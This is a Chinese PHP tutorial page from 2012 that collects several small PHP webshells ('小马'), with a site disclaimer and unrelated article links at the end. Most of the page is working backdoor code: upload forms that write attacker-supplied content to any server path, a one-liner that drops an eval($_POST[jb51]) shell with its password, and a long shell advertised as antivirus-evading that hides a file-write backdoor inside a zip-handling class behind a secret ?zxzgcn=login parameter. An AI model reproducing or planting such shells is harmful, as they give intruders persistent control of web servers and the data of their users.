首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

超小PHP小马小结(方便查找后门的朋友)

Posted in PHP onMay 05, 2012

作者: spider
我也来个超小PHP小马 

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

昨晚无聊看了会 php 的教程,发现php真是相当的强大啊!顺便写了个php小马
下面直接贴代码了。。 
<html> 
<title >By: SinCoder</title> 
<font color=red size=6>php小马 By:SinCoder</br></font> 
<? echo "</br>本程序的路径: ".__FILE__. 
"</br>服务器操作系统: ".PHP_OS. 
"</br>服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]). 
"</br>PHP版本: ".PHP_VERSION; 
?> 
<form action = <? echo strrchr(__FILE__,"\\"); ?> method="post"> 
要提交的数据:</br> 
<textarea type="text" name="data" rows="10" cols="30"> 
</textarea> 
</br> 
保存路径:<input type="text" name="dir" /> 
</br> 
<input type="submit" value="提交"/> 
</form> 
</html> 
<? 
if(!(isset($_POST["data"]) && isset($_POST["dir"]))) 
exit(); 
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) 
{ 
$p_File=fopen($_POST["dir"],"a"); 
if(!$p_File) 
echo "写入失败!请换个目录试试!"; 
else 
echo "Ok!! "; 
fputs($p_File,$_POST["data"]); 
fclose($p_File); 
} 
else 
echo "请把数据填写完整!"; 
?>

php一句话小马的后门 
<?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>

这样访问之后,在当前目录生成jb51.php 内容为 <?eval($_POST[jb51]);?>)?> 的一句话小马,密码为 jb51
最新免杀php小马 
<?php 
class zip 
{ 
var $datasec, $ctrl_dir = array(); 
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; 
var $old_offset = 0; var $dirs = Array("."); 
function get_List($zip_name) 
{ 
$ret = ''; 
$zip = @fopen($zip_name, 'rb'); 
if(!$zip) return(0); 
$centd = $this->ReadCentralDir($zip,$zip_name); 
@rewind($zip); 
@fseek($zip, $centd['offset']); 
for ($i=0; $i<$centd['entries']; $i++) 
{ 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i;$info['filename'] = $header['filename']; 
$info['stored_filename'] = $header['stored_filename']; 
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; 
$info['crc'] = strtoupper(dechex( $header['crc'] )); 
$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; 
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; 
$info['index'] = $header['index'];$info['status'] = $header['status']; 
$ret[]=$info; unset($header); 
} 
return $ret; 
} 
function Add($files,$compact) 
{ 
if(!is_array($files[0])) $files=Array($files); 
for($i=0;$files[$i];$i++){ 
$fn = $files[$i]; 
if(!in_Array(dirname($fn[0]),$this->dirs)) 
$this->add_Dir(dirname($fn[0])); 
if(basename($fn[0])) 
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); 
} 
return $ret; 
} 
function get_file() 
{ 
$data = implode('', $this -> datasec); 
$ctrldir = implode('', $this -> ctrl_dir); 
return $data . $ctrldir . $this -> eof_ctrl_dir . 
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). 
pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; 
} 
function add_dir($name) 
{ 
$name = str_replace("\\", "/", $name); 
$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode("", $this->datasec)); 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
$ext = "\xff\xff\xff\xff"; 
$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; 
$this -> ctrl_dir[] = $cdrec; 
$this -> old_offset = $new_offset; 
$this -> dirs[] = $name; 
} 
function add_File($data, $name, $compact = 1) 
{ 
$name = str_replace('\\', '/', $name); 
$dtime = dechex($this->DosTime()); 
$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] 
. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; 
eval('$hexdtime = "' . $hexdtime . '";'); 
if($compact) 
$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; 
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; 
$unc_len = strlen($data); $crc = crc32($data); 
if($compact){ 
$zdata = gzcompress($data); $c_len = strlen($zdata); 
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
}else{ 
$zdata = $data; 
} 
$c_len=strlen($zdata); 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode('', $this->datasec)); 
if($compact) 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; 
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; 
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); 
$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); 
$cdrec .= pack('V', $this -> old_offset ); 
$this -> old_offset = $new_offset; 
$cdrec .= $name; 
$this -> ctrl_dir[] = $cdrec; 
return true; 
} 
function DosTime() { 
$timearray = getdate(); 
if ($timearray['year'] < 1980) { 
$timearray['year'] = 1980; $timearray['mon'] = 1; 
$timearray['mday'] = 1; $timearray['hours'] = 0; 
$timearray['minutes'] = 0; $timearray['seconds'] = 0; 
} 
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | 
($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
} 
//解压整个压缩包 
//直接用 Extract 会有路径问题,本函数先从列表中获得文件信息并创建好所有目录然后才运行 Extract 
function ExtractAll ( $zn, $to) 
{ 
if(substr($to,-1)!="/") $to .= "/"; 
$files = $this->get_List($zn); 
$cn = count($files); 
if(is_array($files)) 
{ 
for($i=0;$i<$cn;$i++) 
{ 
if($files[$i]['folder']==1){ 
@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
} 
} 
} 
$this->Extract ($zn,$to); 
} 
function Extract ( $zn, $to, $index = Array(-1) ) 
{ 
$ok = 0; $zip = @fopen($zn,'rb'); 
if(!$zip) return(-1); 
$cdir = $this->ReadCentralDir($zip,$zn); 
$pos_entry = $cdir['offset']; 
if(!is_array($index)){ $index = array($index); } 
for($i=0; isset($index[$i]);$i++){ 
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) 
return(-1); 
} 
for ($i=0; $i<$cdir['entries']; $i++) 
{ 
@fseek($zip, $pos_entry); 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i; $pos_entry = ftell($zip); 
@rewind($zip); fseek($zip, $header['offset']); 
if(in_array("-1",$index)||in_array($i,$index)) 
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); 
} 
fclose($zip); 
return $stat; 
} 
function ReadFileHeader($zip) 
{ 
$binary_data = fread($zip, 30); 
$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); 
$header['filename'] = fread($zip, $data['filename_len']); 
if ($data['extra_len'] != 0) { 
$header['extra'] = fread($zip, $data['extra_len']); 
} else { $header['extra'] = ''; } 
$header['compression'] = $data['compression'];$header['size'] = $data['size']; 
$header['compressed_size'] = $data['compressed_size']; 
$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; 
$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; 
if ($header['mdate'] && $header['mtime']){ 
$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; 
$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; 
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
}else{$header['mtime'] = time();} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = "ok"; 
return $header; 
} 
function ReadCentralFileHeaders($zip){ 
$binary_data = fread($zip, 46); 
$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); 
if ($header['filename_len'] != 0) 
$header['filename'] = fread($zip,$header['filename_len']); 
else $header['filename'] = ''; 
if ($header['extra_len'] != 0) 
$header['extra'] = fread($zip, $header['extra_len']); 
else $header['extra'] = ''; 
if ($header['comment_len'] != 0) 
$header['comment'] = fread($zip, $header['comment_len']); 
else $header['comment'] = ''; 
if ($header['mdate'] && $header['mtime']) 
{ 
$hour = ($header['mtime'] & 0xF800) >> 11; 
$minute = ($header['mtime'] & 0x07E0) >> 5; 
$seconde = ($header['mtime'] & 0x001F)*2; 
$year = (($header['mdate'] & 0xFE00) >> 9) + 1980; 
$month = ($header['mdate'] & 0x01E0) >> 5; 
$day = $header['mdate'] & 0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
} else { 
$header['mtime'] = time(); 
} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = 'ok'; 
if (substr($header['filename'], -1) == '/') 
$header['external'] = 0x41FF0010; 
return $header; 
} 
function ReadCentralDir($zip,$zip_name) 
{ 
$size = filesize($zip_name); 
if ($size < 277) $maximum_size = $size; 
else $maximum_size=277; 
@fseek($zip, $size-$maximum_size); 
$pos = ftell($zip); $bytes = 0x00000000; 
while ($pos < $size) 
{ 
$byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); 
if ($bytes == 0x504b0506){ $pos++; break; } $pos++; 
} 
$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); 
if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); 
else $centd['comment'] = ''; $centd['entries'] = $data['entries']; 
$centd['disk_entries'] = $data['disk_entries']; 
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; 
$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; 
return $centd; 
} 
function ExtractFile($header,$to,$zip) 
{ 
$header = $this->readfileheader($zip); 
$header['external'] = (!isset($header['external']) ? 0 : $header['external']); 
if(substr($to,-1)!="/") $to.="/"; 
if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); 
if (!($header['external']==0x41FF0010)&&!($header['external']==16)) 
{ 
if ($header['compression']==0) 
{ 
$fp = @fopen($to.$header['filename'], 'wb'); 
if(!$fp) return(-1); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); 
touch($to.$header['filename'], $header['mtime']); 
}else{ 
$fp = @fopen($to.$header['filename'].'.gz','wb'); 
if(!$fp) return(-1); 
$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), 
Chr(0x00), time(), Chr(0x00), Chr(3)); 
fwrite($fp, $binary_data, 10); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 1024 ? $size : 1024); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
$binary_data = pack('VV', $header['crc'], $header['size']); 
fwrite($fp, $binary_data,8); fclose($fp); 
$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); 
if(!$gzp) return(-2); 
$fp = @fopen($to.$header['filename'],'wb'); 
if(!$fp) return(-1); 
$size = $header['size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = gzread($gzp, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); gzclose($gzp); 
touch($to.$header['filename'], $header['mtime']); 
@unlink($to.$header['filename'].'.gz'); 
}} 
return true; 
} 
} 
if($_GET['zxzgcn']=='login'){ 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="save"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; 
@fclose($fp); 
} 
} 
?>

用法xxx.php?zxzgcn=login

超小PHP小马小结(方便查找后门的朋友)

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
封装一个PDO数据库操作类代码
Sep 09 PHP
PHP迭代器的内部执行过程详解
Nov 12 PHP
ThinkPHP之M方法实例详解
Jun 20 PHP
本地计算机无法启动Apache故障处理
Aug 08 PHP
php实现把url转换迅雷thunder资源下载地址的方法
Nov 07 PHP
php浏览历史记录的方法
Mar 10 PHP
Ajax提交表单时验证码自动验证 php后端验证码检测
Jul 20 PHP
PHP flush 函数使用注意事项
Aug 26 PHP
PHP实现二维数组中的查找算法小结
Jun 09 PHP
详解laravel安装使用Passport(Api认证)
Jul 27 PHP
PHP反射学习入门示例
Jun 14 PHP
php策略模式简单示例分析【区别于工厂模式】
Sep 25 PHP
apache mysql php 源码编译使用方法
May 03 #PHP
几个有用的php字符串过滤,转换函数代码
May 01 #PHP
PHP 基于文件头的文件类型验证类函数
May 01 #PHP
PHP 第三节 变量介绍
Apr 28 #PHP
PHP 第二节 数据类型之转换
Apr 28 #PHP
PHP 第二节 数据类型之数组
Apr 28 #PHP
PHP 第二节 数据类型之字符串类型
Apr 28 #PHP
增删查改(1) 温控(1) 小喇叭开始广播了(1) 克隆(1) #{}(1) 外键(1) 小喇叭(1) 脏读(2) IC-R9500(1) S-2000(1)
You might like
PHP配置文件中最常用四个ini函数
2007/03/19 PHP
PHP常用的小程序代码段
2015/11/14 PHP
PHP连接MySQL进行增、删、改、查操作
2017/02/19 PHP
Yii redis集合的基本使用教程
2020/06/14 PHP
Js实现当前点击a标签变色突出显示其他a标签回复原色
2013/11/27 Javascript
table对象中的insertRow与deleteRow使用示例
2014/01/26 Javascript
IE8中使用javascript动态加载CSS的解决方法
2014/06/17 Javascript
jquery幻灯片插件bxslider样式改进实例
2014/10/15 Javascript
基于jquery实现百度新闻导航菜单滑动动画
2016/03/15 Javascript
JS图片定时翻滚效果实现方法
2016/06/21 Javascript
JS获得多个同name 的input输入框的值的实现方法
2017/01/09 Javascript
JavaScript原型对象、构造函数和实例对象功能与用法详解
2018/08/04 Javascript
vue实现动态显示与隐藏底部导航的方法分析
2019/02/11 Javascript
JS中实现浅拷贝和深拷贝的代码详解
2019/06/05 Javascript
JS实现秒杀倒计时特效
2020/01/02 Javascript
详细探究Python中的字典容器
2015/04/14 Python
python实现类之间的方法互相调用
2018/04/29 Python
解决Pycharm无法import自己安装的第三方module问题
2018/05/18 Python
使用python实现哈希表、字典、集合操作
2019/12/22 Python
Python tkinter模版代码实例
2020/02/05 Python
python 连续不等式语法糖实例
2020/04/15 Python
Python读写压缩文件的方法
2020/07/30 Python
HTML5+CSS3实现无插件拖拽上传图片(支持预览与批量)
2017/01/05 HTML / CSS
HTML5 Canvas 起步(2) - 路径
2009/05/12 HTML / CSS
5 个强大的HTML5 API 函数推荐
2014/11/19 HTML / CSS
耐克巴西官方网站:Nike巴西
2016/08/14 全球购物
美国东北部户外服装和设备零售商:Eastern Mountain Sports
2016/10/05 全球购物
广州喜创信息技术有限公司JAVA软件工程师笔试题
2012/10/17 面试题
中国好声音华少广告词
2014/03/17 职场文书
公司法定代表人授权委托书
2014/09/29 职场文书
2015廉洁自律个人总结
2015/02/14 职场文书
教师师德表现自我评价
2015/03/05 职场文书
2015年新教师工作总结
2015/04/28 职场文书
雷锋的观后感
2015/06/10 职场文书
七一活动主持词
2015/06/29 职场文书
新手入门Mysql--sql执行过程
2021/06/20 MySQL